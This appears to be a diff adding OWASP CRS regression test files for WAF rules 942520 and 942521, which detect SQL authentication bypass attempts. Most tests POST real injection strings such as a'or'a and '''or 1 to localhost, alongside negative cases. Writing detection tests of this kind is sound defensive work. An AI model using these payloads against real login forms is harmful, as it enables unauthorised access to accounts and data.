127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?'bla'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml new file mode 100644 index 0000000000..ce2aa97f31 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml @@ -0,0 +1,387 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.0/4" + enabled: true + name: 942520.yaml +tests: + - test_title: 942520-1 + desc: "Detects basic SQL auth bypass with 'is not something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-2 + desc: "Negative test: 'is notes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-3 + desc: "Detects basic SQL auth bypass with 'not like something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-4 + desc: "Detects basic SQL auth bypass with 'not glob'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-5 + desc: "Detects basic SQL auth bypass with 'not like glob'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-6 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-7 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-8 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-9 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-10 + desc: "Nagive test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-11 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-12 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-14 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-15 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-16 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-17 + desc: "Negative test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-18 + desc: "Detects basic SQL auth bypass with mod" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-19 + desc: "Detects basic SQL auth bypass with: sounds like" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-20 + desc: "Bypass with a comment" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-21 + desc: "Integration test: 942521 blocks foo'or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942520-22 + desc: "Integration test: 942522 blocks foo\\''or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942520-23 + desc: "Detect auth bypass email=' is not?--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log_contains: id "942520" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml new file mode 100644 index 0000000000..848720a522 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml @@ -0,0 +1,387 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.1/4" + enabled: true + name: 942521.yaml +tests: + - test_title: 942521-1 + desc: "Detects the most basic authentication bypass with 'or'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=a'or'a" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-2 + desc: "Detects basic SQLite authentication bypass with 'or?'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=a'or?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-3 + desc: "False-positive: Detects or-based authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=is%20this%20your%20parents'%20or%20yours?" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-4 + desc: "Detects basic SQL auth bypass and-based" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-5 + desc: "False-positve: is it your parents' or yours" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-6 + desc: "Negative test: bob's or alice's" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-7 + desc: "Negative test: mother or daugher" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-8 + desc: "Negative test: 'oreo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='oreo" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-9 + desc: "Negative test: 'fork" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='fork" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-10 + desc: "Negative test: 'for" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%20for" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-11 + desc: "Negative test: ''or" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-12 + desc: "Negative test: 'books' or 'applles'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-13 + desc: "Negative test: bob's presentation's 'or'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-14 + desc: "Bypass with '''or 1" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='''or%201" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-15 + desc: "False-negative: Not detected with escapes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-16 + desc: "Negative test: Wikipedia article about SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-17 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22